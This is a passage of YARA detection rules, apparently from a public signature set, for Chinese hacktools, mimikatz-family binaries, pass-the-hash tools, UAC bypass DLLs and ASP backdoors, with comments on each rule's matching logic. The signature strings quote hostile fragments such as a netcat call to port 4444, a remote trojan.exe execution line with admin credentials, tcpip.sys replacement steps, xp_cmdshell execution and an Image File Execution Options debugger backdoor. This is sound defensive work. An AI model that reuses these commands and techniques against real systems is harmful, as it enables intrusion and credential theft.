        $s1 = "Basic PortScanner"
    condition:
        all of them
// THC-Hydra 7.3 Windows build (hydra.exe) from a Chinese hacktool set; one of
// its characteristic log/help strings in a PE under 700 KB is enough.
rule hydra_7_3_hydra {
    meta:
        description = "Chinese Hacktool Set - file hydra.exe"
        author      = "Florian Roth"
        reference   = "http://tools.zjqhr.com/"
        date        = "2015-06-13"
        hash        = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
    strings:
        // log lines
        $s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
        $s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
        // module-specific templates and help text
        $s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
        $s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
        $s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 700KB and 1 of them
// GOGOGO.bat from a disclosed hacktool set: a batch driver that swaps
// tcpip.sys, re-enables LmHosts and chains into scan.bat. Three lines match.
rule Hacktools_CN_GOGOGO_Bat {
    meta:
        description = "Disclosed hacktool set - file GOGOGO.bat"
        author      = "Florian Roth"
        date        = "17.11.14"
        score       = 60
        hash        = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
    strings:
        // tcpip.sys replacement
        $s2  = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
        $s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
        $s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
        $s6  = "del /f tcpip.sys" fullword ascii
        $s18 = "sc config LmHosts start= auto" fullword ascii
        // scan.bat handling
        $s5  = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
        $s10 = "call scan.bat" fullword ascii
        $s0  = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
        // menu / branching logic and the site banner
        $s9  = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
        $s4  = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
        $s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
        $s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
        $s1  = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
    condition:
        3 of them
// VNCLink.exe from a Chinese hacktool set: a patched vncviewer build (PE under
// 580 KB), recognised by its log path, patch banner and a debug message.
rule CN_Tools_VNCLink {
    meta:
        description = "Chinese Hacktool Set - file VNCLink.exe"
        author      = "Florian Roth"
        reference   = "http://tools.zjqhr.com/"
        date        = "2015-06-13"
        hash        = "cafb531822cbc0cfebbea864489eebba48081aa1"
    strings:
        $s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
        $s1 = "C:\\temp\\vncviewer4.log" fullword ascii
        $s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 580KB and 2 of them
// Super rule over Project1.exe, Generate.exe and rejoice.exe (Chinese hacktool
// set): Delphi-built PEs under 2 MB sharing framework and error strings.
rule _Project1_Generate_rejoice {
    meta:
        description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
        author      = "Florian Roth"
        reference   = "http://tools.zjqhr.com/"
        date        = "2015-06-13"
        super_rule  = 1
        hash0       = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
        hash1       = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
        hash2       = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
    strings:
        // Delphi / framework artefacts
        $s3 = "delphi32.exe" fullword ascii
        $s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
        $s1 = "sfUserAppDataRoaming" fullword ascii
        $s4 = "hkeyCurrentUser" fullword ascii
        // messages
        $s5 = "%s is not a valid IP address." fullword wide
        $s6 = "Citadel hooking error" fullword ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 2000KB and all of them
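// Old disclosed toolset - webget.exe, a small HTTP downloader. There is no MZ or
// filesize gate and " error " / "Downloa" are weak on their own; the packer marker
// $s0 and the literal request line $s1 carry the signal. Expect matches on other
// exe32pack-packed downloaders.
rule sig_238_webget {
	meta:
		description = "Disclosed hacktool set (old stuff) - file webget.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
	strings:
		$s0 = "Packed by exe32pack" ascii
		$s1 = "GET A HTTP/1.0" fullword ascii
		$s2 = " error " fullword ascii
		$s13 = "Downloa" ascii
	condition:
		all of them
}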
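// "Shift shell" from the tools.zjqhr.com set. $s1-$s3 are the build path and file
// names; $s4 is the reg.exe argument fragment (/v debugger /t REG_SZ /d) used to write
// an Image File Execution Options "Debugger" value - the accessibility-feature
// backdoor technique the tool name hints at. 2 of 4 with MZ and < 1500KB.
rule CN_Tools_Shiell {
	meta:
		description = "Chinese Hacktool Set - file Shiell.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "b432d80c37abe354d344b949c8730929d8f9817a"
	strings:
		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii
		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide
		$s3 = "Shift shell.exe" fullword wide
		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 1500KB and 2 of them
}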
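// yarGen rule on BypassUacDll.aps, an MFC resource file (not a PE, hence no MZ gate).
// $s4 AFX_IDP_COMMAND_FAILURE is a stock MFC resource identifier; the DLL name in $s3
// is the only project-specific token, so both are required.
rule BypassUacDll_6 {
	meta:
		description = "Auto-generated rule - file BypassUacDll.aps"
		author = "yarGen Yara Rule Generator"
		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
	strings:
		$s3 = "BypassUacDLL.dll" fullword wide
		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
	condition:
		all of them
}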
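// Super rule for the mimikatz-family files bundled in the toolset. It keys on the
// project URL and author name ($s1, $s2) plus $s3, which presumably comes from the
// certificate chain embedded in the signed binaries - so it also matches unmodified
// releases of mimikatz, which is intended: the tool itself is the indicator.
// The description lists the file set twice (generator artifact, left as is).
rule kiwi_tools {
	meta:
		description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		super_rule = 1
		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
		hash10 = "febadc01a64a071816eac61a85418711debaf233"
		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
	strings:
		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
		$s2 = "Benjamin Delpy" fullword ascii
		$s3 = "GlobalSign" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}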
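// 445.rar from the disclosed toolset: matches on member names stored in clear in the
// archive ($s1, $s2, $s4-$s6) and on the batch loop that starts cmd.bat once per IP
// ($s0). "all of them" is strict - a re-packed or renamed copy will not match.
rule Hacktools_CN_Panda_445 {
	meta:
		description = "Disclosed hacktool set - file 445.rar"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
	strings:
		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
		$s1 = "445\\nc.exe" fullword ascii
		$s2 = "445\\s.exe" fullword ascii
		$s3 = "cs.exe %1" fullword ascii
		$s4 = "445\\cs.exe" fullword ascii
		$s5 = "445\\ip.txt" fullword ascii
		$s6 = "445\\cmd.bat" fullword ascii
		$s9 = "@echo off" fullword ascii
	condition:
		all of them
}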
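// XYZCmd.exe - remote command execution tool ("Executes Command Remotely"). Four
// UI/version strings, all required; no MZ or filesize gate.
rule XYZCmd_zip_Folder_XYZCmd {
	meta:
		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
	strings:
		$s0 = "Executes Command Remotely" fullword wide
		$s2 = "XYZCmd.exe" fullword wide
		$s6 = "No Client Software" fullword wide
		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
	condition:
		all of them
}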
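// Windows Credential Editor (WCE). The three meta fields share one line, which YARA
// accepts but most linters flag. The strings carry no modifiers (ASCII, non-fullword)
// and the condition is "$a or $b" with no MZ/filesize gate, so the product name in $b
// will also hit documents and reports that merely mention WCE. $a is duplicated as $e
// in the Amplia_Security_Tool rule of this set.
rule WindowsCredentialEditor
{
    meta:
    	description = "Windows Credential Editor" threat_level = 10 score = 90
    strings:
		$a = "extract the TGT session key"
		$b = "Windows Credentials Editor"
    condition:
    	$a or $b
}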
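// Readme.txt shipped with XYZCmd; $s3 is the usage example line and $s20 the version
// banner. Text-file rule, so there is no MZ gate by design.
rule XYZCmd_zip_Folder_Readme {
	meta:
		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
	strings:
		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
		$s20 = "XYZCmd V1.0" fullword ascii
	condition:
		all of them
}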
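// BypassUac.zip: matches the archive by the stored member paths ($s0-$s3) plus the
// bare "BypassUac" token. Renaming the members breaks the match; renaming only the
// zip file does not.
rule BypassUac_9 {
	meta:
		description = "Auto-generated rule - file BypassUac.zip"
		author = "yarGen Yara Rule Generator"
		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
	strings:
		$s0 = "/x86/BypassUac.exe" fullword ascii
		$s1 = "/x64/BypassUac.exe" fullword ascii
		$s2 = "/x86/BypassUacDll.dll" fullword ascii
		$s3 = "/x64/BypassUacDll.dll" fullword ascii
		$s15 = "BypassUac" fullword ascii
	condition:
		all of them
}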
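// regdll.asp - ASP page that (un)registers COM DLLs by running regsvr32.exe /u/s
// through a shell object; $s1/$s3 are the two Run forms, $s4 the exit-code echo.
// The hard-coded c:\WINNT path dates it to NT4/2000 hosts; copies edited for newer
// system paths will not satisfy "all of them".
rule aspbackdoor_regdll {
	meta:
		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
	strings:
		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
		$s5 = "Public Property Get oFS()" fullword ascii
	condition:
		all of them
}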
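// hkmjjiis6.exe (IIS6-targeting tool). Several strings are deliberately truncated
// fragments ("user32.dlly", "WinSta0\Defau", "GetLag", "LookupAcc"), presumably
// mirroring how the sample stores them - do not "fix" them to full API names.
// The WMI query on IIsWebInfo ($s7) and wmiprvse.exe ($s8) are the IIS-specific
// tokens. All nine required, MZ and < 70KB.
rule hkmjjiis6 {
	meta:
		description = "Chinese Hacktool Set - file hkmjjiis6.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
	strings:
		$s1 = "comspec" fullword ascii
		$s2 = "user32.dlly" ascii
		$s3 = "runtime error" ascii
		$s4 = "WinSta0\\Defau" ascii
		$s5 = "AppIDFlags" fullword ascii
		$s6 = "GetLag" fullword ascii
		$s7 = "* FROM IIsWebInfo" ascii
		$s8 = "wmiprvse.exe" ascii
		$s9 = "LookupAcc" ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 70KB and all of them
}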
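// s.exe port scanner. $s2 is the Easy Programming Language (eyuyan.com) runtime
// marker found in a great many Chinese programs; $s0 and the author's QQ tag in $s1
// are the discriminators. No MZ or filesize gate, all three required.
rule CN_Hacktool_S_EXE_Portscanner {
	meta:
		description = "Detects a chinese Portscanner named s.exe"
		author = "Florian Roth"
		score = 70
		date = "12.10.2014"
	strings:
		$s0 = "\\Result.txt" fullword ascii
		$s1 = "By:ZT QQ:376789051" fullword ascii
		$s2 = "(http://www.eyuyan.com)" fullword wide
	condition:
		all of them
}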
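// Kiwi Taskmgr (mimikatz-family helper): three wide UI strings, all required,
// MZ and < 300KB. The hash also appears as hash13 of the kiwi_tools super rule.
rule KiwiTaskmgr_2 {
	meta:
		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
	strings:
		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
		$s2 = "Kiwi Taskmgr no-gpo" fullword wide
		$s3 = "KiwiAndTaskMgr" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 300KB and all of them
}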
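// config.ini of the VUBrute brute-force tool (PoS scammer toolbox). All seven INI
// keys must be present; the non-fullword ones ($s6, $s12, $s13) accept any value,
// the fullword ones pin the exact value seen in the sample.
rule VUBrute_config {
	meta:
		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
		author = "Florian Roth"
		date = "22.11.14"
		score = 70
		reference = "http://goo.gl/xiIphp"
		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
	strings:
		$s2 = "Restore=1" fullword ascii
		$s6 = "Thread=" ascii
		$s7 = "Running=1" fullword ascii
		$s8 = "CheckCombination=" fullword ascii
		$s10 = "AutoSave=1.000000" fullword ascii
		$s12 = "TryConnect=" ascii
		$s13 = "Tray=" ascii
	condition:
		all of them
}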
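// VSSown.vbs - WMI script that creates and exposes Volume Shadow Copies so that
// locked files such as NTDS can be copied out. $s3-$s5 are generic WMI/WScript
// tokens; $s0-$s2 (VSS service query, Win32_ShadowCopy, mklink /D) are the
// discriminators. All six required; text file, so no MZ gate.
rule VSSown_VBS {
	meta:
		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
		author = "Florian Roth"
		date = "2015-10-01"
		score = 75
	strings:
		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
		$s1 = "Select * From Win32_ShadowCopy" ascii
		$s2 = "cmd /C mklink /D " ascii
		$s3 = "ClientAccessible" ascii
		$s4 = "WScript.Shell" ascii
		$s5 = "Win32_Process" ascii
	condition:
		all of them
}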
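// whosthere-alt (Core Security Pass-The-Hash Toolkit): lists LSA logon sessions with
// NTLM credentials. Banner and help-text strings; 2 of 8 with MZ and < 280KB.
// Note the plain-text author name in $s0 is what also triggers the looser
// Amplia_Security_Tool rule in this set.
rule whosthere_alt : Toolkit {
	meta:
		description = "Auto-generated rule - file whosthere-alt.exe"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
	strings:
		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '49.00' */
		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */
		$s2 = "dump output to a file, -o filename" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii /* PEStudio Blacklist: strings */ /* score: '29.00' */
		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii /* score: '24.00' */
		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */
		$s6 = ".\\pth.dll" fullword ascii /* score: '16.00' */
		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 280KB and 2 of them
}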
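// EDIT.ASP - web-based file editor guarded by a hard-coded cookie password ($s5).
// 5 of 7: $s7 is a CSS fragment and $s1 a charset meta tag, so the ASP-specific
// lines ($s2, $s3, $s5, $s6, $s13) should carry most genuine matches.
rule aspbackdoor_EDIT {
	meta:
		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
	strings:
		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
	condition:
		5 of them
}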
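// PcInit.exe. $s4-$s6 are flagged by yarGen as goodware strings; the format strings
// $s2 and $s3 (Global\ps%08x object name) are what identifies the sample. All six
// required, MZ and < 50KB.
rule update_PcInit {
	meta:
		description = "Chinese Hacktool Set - file PcInit.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
	strings:
		$s1 = "\\svchost.exe" fullword ascii
		$s2 = "%s%08x.001" fullword ascii
		$s3 = "Global\\ps%08x" fullword ascii
		$s4 = "drivers\\" fullword ascii /* Goodware String - occured 2 times */
		$s5 = "StrStrA" fullword ascii /* Goodware String - occured 43 times */
		$s6 = "StrToIntA" fullword ascii /* Goodware String - occured 44 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 50KB and all of them
}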
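// Cerberus NBTDUMP - NetBIOS enumerator that writes an HTML report; the report
// strings ($s11, $s18-$s20) include the guessed/blank password lines, which are the
// most telling ones. 5 of 7, no MZ gate (the wide strings are also present in the
// generated reports).
rule sig_238_nbtdump {
	meta:
		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
	strings:
		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
		$s7 = "Cerberus NBTDUMP" fullword ascii
		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
		$s19 = "%s's password is %s</H3>" fullword wide
		$s20 = "%s's password is blank</H3>" fullword wide
	condition:
		5 of them
}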
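// THC's pw-inspector: trims a wordlist to a password policy. It is a stock
// pentest utility, and the rule matches its Windows build by the help text; hits
// indicate the tool is present, not that it was used.
rule pw_inspector {
	meta:
		description = "Chinese Hacktool Set - file pw-inspector.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
	strings:
		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
		$s2 = "http://www.thc.org" fullword ascii
		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 460KB and all of them
}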
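// Sqlcmd.exe from HScan (cnhonker): connects to MSSQL with supplied credentials and
// runs OS commands through xp_cmdshell ($s5). 3 of 7 with MZ and < 40KB; $s10/$s11
// are short, so the banner/usage strings should be the ones seen in practice.
rule tools_Sqlcmd {
	meta:
		description = "Chinese Hacktool Set - file Sqlcmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "99d56476e539750c599f76391d717c51c4955a33"
	strings:
		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii /* PEStudio Blacklist: os */
		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
		$s10 = "Error,exit!" fullword ascii
		$s11 = "Sqlcmd>" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 40KB and 3 of them
}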
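// MilkT port scanner. $s2-$s6 are DLL/import names present in countless binaries;
// the discriminators are $s0 and $s1, and since there is no MZ or filesize gate the
// rule's precision rests on those two alone.
rule CN_Hacktool_MilkT_Scanner {
	meta:
		description = "Detects a chinese Portscanner named MilkT"
		author = "Florian Roth"
		score = 60
		date = "12.10.2014"
	strings:
		$s0 = "Bf **************" ascii fullword
		$s1 = "forming Time: %d/" ascii
		$s2 = "KERNEL32.DLL" ascii fullword
		$s3 = "CRTDLL.DLL" ascii fullword
		$s4 = "WS2_32.DLL" ascii fullword
		$s5 = "GetProcAddress" ascii fullword
		$s6 = "atoi" ascii fullword
	condition:
		all of them
}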
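// genhash.exe (Core Security Pass-The-Hash Toolkit): computes the LM and NT hashes of
// a given password. Usage and output-format strings; 2 of 5 with MZ and < 200KB.
// $s4 is a generic 16-byte hex format string and should not be relied on alone.
rule genhash_genhash : Toolkit  {
	meta:
		description = "Auto-generated rule - file genhash.exe"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
	strings:
		$s1 = "genhash.exe <password>" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */
		$s3 = "Password: %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */
		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii /* score: '11.00' */
		$s5 = "This tool generates LM and NT hashes." fullword ascii /* score: '10.00' */
		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii /* score: '10.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}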
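// cmd.bat from the 445 toolset. "$bat at 0" anchors "@echo off" to file offset 0, so
// a copy with a BOM or a leading blank line will not match even though $s0 and $s2
// are present - a deliberate trade of recall for precision.
rule Hacktools_CN_445_cmd {
	meta:
		description = "Disclosed hacktool set - file cmd.bat"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
	strings:
		$bat = "@echo off" fullword ascii
		$s0 = "cs.exe %1" fullword ascii
		$s2 = "nc %1 4444" fullword ascii
	condition:
		$bat at 0 and all of ($s*)
}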
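// look.exe - matched by its embedded application manifest (author QQ tag, version
// and assembly name). All three required, MZ and < 40KB.
rule Dos_look {
	meta:
		description = "Chinese Hacktool Set - file look.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
	strings:
		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
		$s2 = "version=\"9.9.9.9\"" fullword ascii
		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 40KB and all of them
}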
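// BypassUacDll.dll. $s7 ("BypassUacDLL", fullword wide) also matches inside $s0
// ("BypassUacDLL.dll") because '.' counts as a word boundary, so the two always hit
// together and "3 of them" effectively needs just one of $s1/$s3 on top. No MZ gate.
rule BypassUac_3 {
	meta:
		description = "Auto-generated rule - file BypassUacDll.dll"
		author = "yarGen Yara Rule Generator"
		hash = "1974aacd0ed987119999735cad8413031115ce35"
	strings:
		$s0 = "BypassUacDLL.dll" fullword wide
		$s1 = "\\Release\\BypassUacDll" ascii
		$s3 = "Win7ElevateDLL" fullword wide
		$s7 = "BypassUacDLL" fullword wide
	condition:
		3 of them
}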
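// LSA/SAM dump detection by Benjamin Delpy. $str_msv_lsa decodes to "LSASRV.DLL\0"
// followed within 32 bytes by "msv1_0.dll\0", and $hex_bkey to "KSSM" followed 20-70
// bytes later by 05 00 01 00. $hex_api_call looks like the constants loaded before an
// API call (0x02000000 is MAXIMUM_ALLOWED) - confirm against the tools it was derived
// from. The SAM path pair counts "\Domains\Account" only when the longer
// "...\Users\Names\" reference is absent. The trailing "and not uint16(0) == 0x5a4d"
// deliberately excludes PE files, so this rule targets non-PE carriers (scripts, dumps,
// archives); pair it with the PE-gated rules in this set for executables.
rule lsadump
{
	meta:
		description		= "LSA dump programe (bootkey/syskey) - pwdump and others"
		author			= "Benjamin DELPY (gentilkiwi)"

	strings:
		$str_sam_inc	= "\\Domains\\Account" ascii nocase
		$str_sam_exc	= "\\Domains\\Account\\Users\\Names\\" ascii nocase
		$hex_api_call	= {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 }
		$str_msv_lsa	= { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 }
		$hex_bkey		= { 4b 53 53 4d [20-70] 05 00 01 00}

	condition:
		( ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey )
		and not uint16(0) == 0x5a4d
}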
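// Kiwi Cmd (mimikatz-family helper), 64-bit build: 2 of 3 wide UI strings, MZ and
// < 400KB. The hash also appears as hash11 of the kiwi_tools super rule.
rule x64_KiwiCmd {
	meta:
		description = "Chinese Hacktool Set - file KiwiCmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
	strings:
		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
		$s2 = "Kiwi Cmd no-gpo" fullword wide
		$s3 = "KiwiAndCMD" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 400KB and 2 of them
}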
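// entice.asp - ASP page that executes a SQL statement taken straight from the request
// ($s2 only checks that it starts with "select"; $s4 executes it). Matched on the
// form, include and query-building lines; all five required, text file so no MZ gate.
rule aspbackdoor_entice {
	meta:
		description = "Disclosed hacktool set (old stuff) - file entice.asp"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
	strings:
		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
	condition:
		all of them
}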
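// s.exe multi-function scanner. $s5, $s7, $s11 and $s13 read like generic runtime
// messages of the E compiler ($s7 names it); if they are, those four alone satisfy
// "4 of them" on any E-language program under 8000KB. Consider additionally requiring
// one of the sample-specific strings ($s0-$s4, $s6, $s14) before acting on a hit.
rule S_MultiFunction_Scanners_s {
	meta:
		description = "Chinese Hacktool Set - file s.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
	strings:
		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
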